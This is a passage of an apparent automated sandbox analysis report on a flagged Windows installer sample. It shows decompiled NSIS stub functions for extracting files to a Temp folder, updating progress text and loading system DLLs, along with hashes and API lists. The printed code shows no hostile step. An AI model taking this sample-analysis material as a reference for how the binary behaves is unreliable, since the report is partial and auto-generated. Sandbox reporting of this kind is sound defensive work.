								_t98 = _t88;
							}
							if(E004034CF(0x41ea20, _t98) == 0) {
								goto L41;
							}
							_t69 = E004060DF(_a8, 0x41ea20, _t98); // executed
							if(_t69 == 0) {
								L28:
								_push(0xfffffffe);
								L42:
								_pop(_t65);
								return _t65;
							}
							_v8 = _v8 + _t98;
							_a16 = _a16 - _t98;
							if(_a16 > 0) {
								continue;
							}
							goto L44;
						}
						goto L41;
					}
					_t70 = GetTickCount();
					 *0x40d384 =  *0x40d384 & 0x00000000;
					 *0x40d380 =  *0x40d380 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t70;
					 *0x40ce68 = 8;
					 *0x416a10 = 0x40ea08;
					 *0x416a0c = 0x40ea08;
					 *0x416a08 = 0x416a08;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L44;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t99 = 0x4000;
						if(_a16 < 0x4000) {
							_t99 = _a16;
						}
						if(E004034CF(0x41ea20, _t99) == 0) {
							goto L41;
						}
						_a16 = _a16 - _t99;
						 *0x40ce58 = 0x41ea20;
						 *0x40ce5c = _t99;
						while(1) {
							_t95 = _v16;
							 *0x40ce60 = _t95;
							 *0x40ce64 = _v12;
							_t75 = E00406A65(0x40ce58);
							_v24 = _t75;
							if(_t75 < 0) {
								break;
							}
							_t100 =  *0x40ce60; // 0x425a20
							_t101 = _t100 - _t95;
							_t76 = GetTickCount();
							_t96 = _t76;
							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t102 = _t102 + 0xc;
								E0040559F(0,  &_v152); // executed
								_v20 = _t96;
							}
							if(_t101 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L44;
							} else {
								if(_a12 != 0) {
									_t77 =  *0x40ce60; // 0x425a20
									_v8 = _v8 + _t101;
									_v12 = _v12 - _t101;
									_v16 = _t77;
									L23:
									if(_v24 != 1) {
										continue;
									}
									goto L44;
								}
								_t78 = E004060DF(_a8, _v16, _t101); // executed
								if(_t78 == 0) {
									goto L28;
								}
								_v8 = _v8 + _t101;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}


























                                                                            0x004032bf
                                                                            0x004032c3
                                                                            0x004032c6
                                                                            0x004032cb
                                                                            0x004032cd
                                                                            0x004032cd
                                                                            0x004032d4
                                                                            0x004032d8
                                                                            0x004032dd
                                                                            0x004032df
                                                                            0x004032df
                                                                            0x004032e6
                                                                            0x004032eb
                                                                            0x004032f6
                                                                            0x004032f6
                                                                            0x00403308
                                                                            0x004034bd
                                                                            0x004034bd
                                                                            0x00000000
                                                                            0x0040330e
                                                                            0x00403312
                                                                            0x0040346a
                                                                            0x004034ad
                                                                            0x004034af
                                                                            0x004034af
                                                                            0x004034bb
                                                                            0x004034c2
                                                                            0x004034c5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004034bb
                                                                            0x0040346f
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403471
                                                                            0x00403474
                                                                            0x00403477
                                                                            0x0040347a
                                                                            0x0040347c
                                                                            0x0040347c
                                                                            0x0040348c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403493
                                                                            0x0040349a
                                                                            0x00403464
                                                                            0x00403464
                                                                            0x004034bf
                                                                            0x004034bf
                                                                            0x00000000
                                                                            0x004034bf
                                                                            0x0040349c
                                                                            0x0040349f
                                                                            0x004034a6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004034a8
                                                                            0x00000000
                                                                            0x00403474
                                                                            0x0040331e
                                                                            0x00403320
                                                                            0x00403327
                                                                            0x0040332e
                                                                            0x0040332e
                                                                            0x00403335
                                                                            0x0040333d
                                                                            0x00403347
                                                                            0x0040334c
                                                                            0x00403354
                                                                            0x0040335e
                                                                            0x00403361
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403367
                                                                            0x00403367
                                                                            0x00403367
                                                                            0x0040336f
                                                                            0x00403371
                                                                            0x00403371
                                                                            0x00403382
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403388
                                                                            0x0040338b
                                                                            0x00403391
                                                                            0x00403397
                                                                            0x00403397
                                                                            0x004033a2
                                                                            0x004033a8
                                                                            0x004033ad
                                                                            0x004033b4
                                                                            0x004033b7
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004033bd
                                                                            0x004033c3
                                                                            0x004033c5
                                                                            0x004033ce
                                                                            0x004033d0
                                                                            0x00403401
                                                                            0x00403407
                                                                            0x00403413
                                                                            0x00403418
                                                                            0x00403418
                                                                            0x0040341d
                                                                            0x00403458
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040341f
                                                                            0x00403423
                                                                            0x0040343a
                                                                            0x0040343f
                                                                            0x00403442
                                                                            0x00403445
                                                                            0x00403448
                                                                            0x0040344c
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403452
                                                                            0x0040342c
                                                                            0x00403433
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00403435
                                                                            0x00000000
                                                                            0x00403435
                                                                            0x0040341d
                                                                            0x00403460
                                                                            0x00000000
                                                                            0x00403460
                                                                            0x00000000
                                                                            0x00403367

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: CountTick$wsprintf
                                                                            • String ID: *B$ ZB$ A$ A$... %d%%$}8@
                                                                            • API String ID: 551687249-3683892814
                                                                            • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                            • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                                            • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                                            • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 569 40176f-401794 call 402da6 call 405e83 574 401796-40179c call 40653d 569->574 575 40179e-4017b0 call 40653d call 405e0c lstrcatW 569->575 580 4017b5-4017b6 call 4067c4 574->580 575->580 584 4017bb-4017bf 580->584 585 4017c1-4017cb call 406873 584->585 586 4017f2-4017f5 584->586 593 4017dd-4017ef 585->593 594 4017cd-4017db CompareFileTime 585->594 588 4017f7-4017f8 call 406008 586->588 589 4017fd-401819 call 40602d 586->589 588->589 596 40181b-40181e 589->596 597 40188d-4018b6 call 40559f call 4032b4 589->597 593->586 594->593 599 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 596->599 600 40186f-401879 call 40559f 596->600 611 4018b8-4018bc 597->611 612 4018be-4018ca SetFileTime 597->612 599->584 633 401864-401865 599->633 609 401882-401888 600->609 613 402c33 609->613 611->612 615 4018d0-4018db CloseHandle 611->615 612->615 619 402c35-402c39 613->619 617 4018e1-4018e4 615->617 618 402c2a-402c2d 615->618 621 4018e6-4018f7 call 40657a lstrcatW 617->621 622 4018f9-4018fc call 40657a 617->622 618->613 626 401901-402398 621->626 622->626 631 40239d-4023a2 626->631 632 402398 call 405b9d 626->632 631->619 632->631 633->609 634 401867-401868 633->634 634->600
                                                                            C-Code - Quality: 75%
                                                                            			E0040176F(FILETIME* __ebx, void* __eflags) {
				void* __esi;
				void* _t35;
				void* _t43;
				void* _t45;
				FILETIME* _t51;
				FILETIME* _t64;
				void* _t66;
				signed int _t72;
				FILETIME* _t73;
				FILETIME* _t77;
				signed int _t79;
				WCHAR* _t81;
				void* _t83;
				void* _t84;
				void* _t86;

				_t77 = __ebx;
				 *(_t86 - 8) = E00402DA6(0x31);
				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
				_t35 = E00405E83( *(_t86 - 8));
				_push( *(_t86 - 8));
				_t81 = L"Call";
				if(_t35 == 0) {
					lstrcatW(E00405E0C(E0040653D(_t81, L"C:\\Users\\Arthur\\AppData\\Local\\Temp")), ??);
				} else {
					E0040653D();
				}
				E004067C4(_t81);
				while(1) {
					__eflags =  *(_t86 + 8) - 3;
					if( *(_t86 + 8) >= 3) {
						_t66 = E00406873(_t81);
						_t79 = 0;
						__eflags = _t66 - _t77;
						if(_t66 != _t77) {
							_t73 = _t66 + 0x14;
							__eflags = _t73;
							_t79 = CompareFileTime(_t73, _t86 - 0x24);
						}
						asm("sbb eax, eax");
						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
						__eflags = _t72;
						 *(_t86 + 8) = _t72;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) == _t77) {
						E00406008(_t81);
					}
					__eflags =  *(_t86 + 8) - 1;
					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
					__eflags = _t43 - 0xffffffff;
					 *(_t86 - 0x38) = _t43;
					if(_t43 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t86 + 8) - _t77;
					if( *(_t86 + 8) != _t77) {
						E0040559F(0xffffffe2,  *(_t86 - 8));
						__eflags =  *(_t86 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t86 - 4)) = 1;
						}
						L31:
						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
						__eflags =  *0x434f88;
						goto L32;
					} else {
						E0040653D("C:\Users\Arthur\AppData\Local\Temp\nswCA44.tmp", _t83);
						E0040653D(_t83, _t81);
						E0040657A(_t77, _t81, _t83, "C:\Users\Arthur\AppData\Local\Temp\nswCA44.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
						E0040653D(_t83, "C:\Users\Arthur\AppData\Local\Temp\nswCA44.tmp");
						_t64 = E00405B9D("C:\Users\Arthur\AppData\Local\Temp\nswCA44.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
						__eflags = _t64;
						if(_t64 == 0) {
							continue;
						} else {
							__eflags = _t64 == 1;
							if(_t64 == 1) {
								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
								L32:
								_t51 = 0;
								__eflags = 0;
							} else {
								_push(_t81);
								_push(0xfffffffa);
								E0040559F();
								L29:
								_t51 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t51;
				}
				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
				 *0x434fb4 =  *0x434fb4 + 1;
				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
				 *0x434fb4 =  *0x434fb4 - 1;
				__eflags =  *(_t86 - 0x24) - 0xffffffff;
				_t84 = _t45;
				if( *(_t86 - 0x24) != 0xffffffff) {
					L22:
					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
						goto L22;
					}
				}
				CloseHandle( *(_t86 - 0x38)); // executed
				__eflags = _t84 - _t77;
				if(_t84 >= _t77) {
					goto L31;
				} else {
					__eflags = _t84 - 0xfffffffe;
					if(_t84 != 0xfffffffe) {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
					} else {
						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
						lstrcatW(_t81,  *(_t86 - 8));
					}
					_push(0x200010);
					_push(_t81);
					E00405B9D();
					goto L29;
				}
				goto L33;
			}


















                                                                            0x0040176f
                                                                            0x00401776
                                                                            0x00401782
                                                                            0x00401785
                                                                            0x0040178a
                                                                            0x0040178d
                                                                            0x00401794
                                                                            0x004017b0
                                                                            0x00401796
                                                                            0x00401797
                                                                            0x00401797
                                                                            0x004017b6
                                                                            0x004017bb
                                                                            0x004017bb
                                                                            0x004017bf
                                                                            0x004017c2
                                                                            0x004017c7
                                                                            0x004017c9
                                                                            0x004017cb
                                                                            0x004017d0
                                                                            0x004017d0
                                                                            0x004017db
                                                                            0x004017db
                                                                            0x004017ec
                                                                            0x004017ee
                                                                            0x004017ee
                                                                            0x004017ef
                                                                            0x004017ef
                                                                            0x004017f2
                                                                            0x004017f5
                                                                            0x004017f8
                                                                            0x004017f8
                                                                            0x004017ff
                                                                            0x0040180e
                                                                            0x00401813
                                                                            0x00401816
                                                                            0x00401819
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x0040181b
                                                                            0x0040181e
                                                                            0x00401874
                                                                            0x00401879
                                                                            0x004015b6
                                                                            0x0040292e
                                                                            0x0040292e
                                                                            0x00402c2a
                                                                            0x00402c2d
                                                                            0x00402c2d
                                                                            0x00000000
                                                                            0x00401820
                                                                            0x00401826
                                                                            0x0040182d
                                                                            0x0040183a
                                                                            0x00401845
                                                                            0x0040185b
                                                                            0x0040185b
                                                                            0x0040185e
                                                                            0x00000000
                                                                            0x00401864
                                                                            0x00401864
                                                                            0x00401865
                                                                            0x00401882
                                                                            0x00402c33
                                                                            0x00402c33
                                                                            0x00402c33
                                                                            0x00401867
                                                                            0x00401867
                                                                            0x00401868
                                                                            0x00401493
                                                                            0x0040239d
                                                                            0x0040239d
                                                                            0x0040239d
                                                                            0x00401865
                                                                            0x0040185e
                                                                            0x00402c35
                                                                            0x00402c39
                                                                            0x00402c39
                                                                            0x00401892
                                                                            0x00401897
                                                                            0x004018a5
                                                                            0x004018aa
                                                                            0x004018b0
                                                                            0x004018b4
                                                                            0x004018b6
                                                                            0x004018be
                                                                            0x004018ca
                                                                            0x004018b8
                                                                            0x004018b8
                                                                            0x004018bc
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004018bc
                                                                            0x004018d3
                                                                            0x004018d9
                                                                            0x004018db
                                                                            0x00000000
                                                                            0x004018e1
                                                                            0x004018e1
                                                                            0x004018e4
                                                                            0x004018fc
                                                                            0x004018e6
                                                                            0x004018e9
                                                                            0x004018f2
                                                                            0x004018f2
                                                                            0x00401901
                                                                            0x00401906
                                                                            0x00402398
                                                                            0x00000000
                                                                            0x00402398
                                                                            0x00000000

                                                                            APIs
                                                                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                            • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,?,?,00000031), ref: 004017D5
                                                                              • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00000000,00425A20,76FA23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00000000,00425A20,76FA23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                              • Part of subcall function 0040559F: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00403418), ref: 004055FA
                                                                              • Part of subcall function 0040559F: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll), ref: 0040560C
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                            • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nswCA44.tmp$C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll$Call
                                                                            • API String ID: 1941528284-1044292392
                                                                            • Opcode ID: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                                            • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                                                                            • Opcode Fuzzy Hash: e76ef7c14b194b1d558144f9db04474b742f47f92f43e4e9c0b682ed5946015e
                                                                            • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040559F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72stringwindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 635 40559f-4055b4 636 4055ba-4055cb 635->636 637 40566b-40566f 635->637 638 4055d6-4055e2 lstrlenW 636->638 639 4055cd-4055d1 call 40657a 636->639 641 4055e4-4055f4 lstrlenW 638->641 642 4055ff-405603 638->642 639->638 641->637 643 4055f6-4055fa lstrcatW 641->643 644 405612-405616 642->644 645 405605-40560c SetWindowTextW 642->645 643->642 646 405618-40565a SendMessageW * 3 644->646 647 40565c-40565e 644->647 645->644 646->647 647->637 648 405660-405663 647->648 648->637
                                                                            C-Code - Quality: 100%
                                                                            			E0040559F(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x433ee4;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x434fb4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040657A(_t38, 0, 0x42c248, 0x42c248, _a4);
					}
					_t27 = lstrlenW(0x42c248);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42c248;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x42c248[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x42c248, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                                            0x004055a5
                                                                            0x004055af
                                                                            0x004055b4
                                                                            0x004055ba
                                                                            0x004055c5
                                                                            0x004055c8
                                                                            0x004055cb
                                                                            0x004055d1
                                                                            0x004055d1
                                                                            0x004055d7
                                                                            0x004055df
                                                                            0x004055e2
                                                                            0x004055ff
                                                                            0x00405603
                                                                            0x0040560c
                                                                            0x0040560c
                                                                            0x00405616
                                                                            0x0040561f
                                                                            0x0040562b
                                                                            0x00405632
                                                                            0x00405636
                                                                            0x00405639
                                                                            0x0040564c
                                                                            0x0040565a
                                                                            0x0040565a
                                                                            0x0040565e
                                                                            0x00405660
                                                                            0x00405663
                                                                            0x00000000
                                                                            0x00405663
                                                                            0x004055e4
                                                                            0x004055ec
                                                                            0x004055f4
                                                                            0x004055fa
                                                                            0x00000000
                                                                            0x004055fa
                                                                            0x004055f4
                                                                            0x004055e2
                                                                            0x0040566f

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00000000,00425A20,76FA23A0,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                                                                            • lstrlenW.KERNEL32(00403418,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00000000,00425A20,76FA23A0,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                                                                            • lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00403418), ref: 004055FA
                                                                            • SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll), ref: 0040560C
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                                                                              • Part of subcall function 0040657A: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                                                                              • Part of subcall function 0040657A: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,?,004055D6,Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll,00000000), ref: 00406779
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                                            • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nswCA44.tmp\System.dll
                                                                            • API String ID: 1495540970-3423461562
                                                                            • Opcode ID: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                            • Instruction ID: 138a2a903332092674924c4fce2a37a83712bc812e9b86ab44911e1df8857bb6
                                                                            • Opcode Fuzzy Hash: 738a72538bd68e99fc25cc5aeb13fda9b39fd06f1dca7185dcaff0c953f7535c
                                                                            • Instruction Fuzzy Hash: C1219071900558BACF11AFA9DD84DDFBF75EF45354F14803AF904B22A0C7794A419F68
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0040689A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 649 40689a-4068ba GetSystemDirectoryW 650 4068bc 649->650 651 4068be-4068c0 649->651 650->651 652 4068d1-4068d3 651->652 653 4068c2-4068cb 651->653 654 4068d4-406907 wsprintfW LoadLibraryExW 652->654 653->652 655 4068cd-4068cf 653->655 655->654
                                                                            C-Code - Quality: 100%
                                                                            			E0040689A(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}








                                                                            0x004068b1
                                                                            0x004068ba
                                                                            0x004068bc
                                                                            0x004068bc
                                                                            0x004068c0
                                                                            0x004068d3
                                                                            0x004068cd
                                                                            0x004068cd
                                                                            0x004068cd
                                                                            0x004068ec
                                                                            0x00406900
                                                                            0x00406907

                                                                            APIs
                                                                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                                                                            • wsprintfW.USER32 ref: 004068EC
                                                                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.206446495657.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.206446448708.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446555788.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446598322.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446783774.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446822455.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446863093.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000002.00000002.206446911989.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                            • String ID: %s%S.dll$UXTHEME$\
                                                                            • API String ID: 2200240437-1946221925
                                                                            • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                            • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                                                                            • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                                                                            • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405A6E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 656 405a6e-405ab9 CreateDirectoryW 657 405abb-405abd 656->657 658 405abf-405acc GetLastError 656->658 659 405ae6-405ae8 657->659 658->659 660 405ace-405ae2 SetFileSecurityW 658->660 660->657 661 405ae4 GetLastError 660->661 661->659
                                                                            C-Code - Quality: 100%
                                                                            			E00405A6E(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

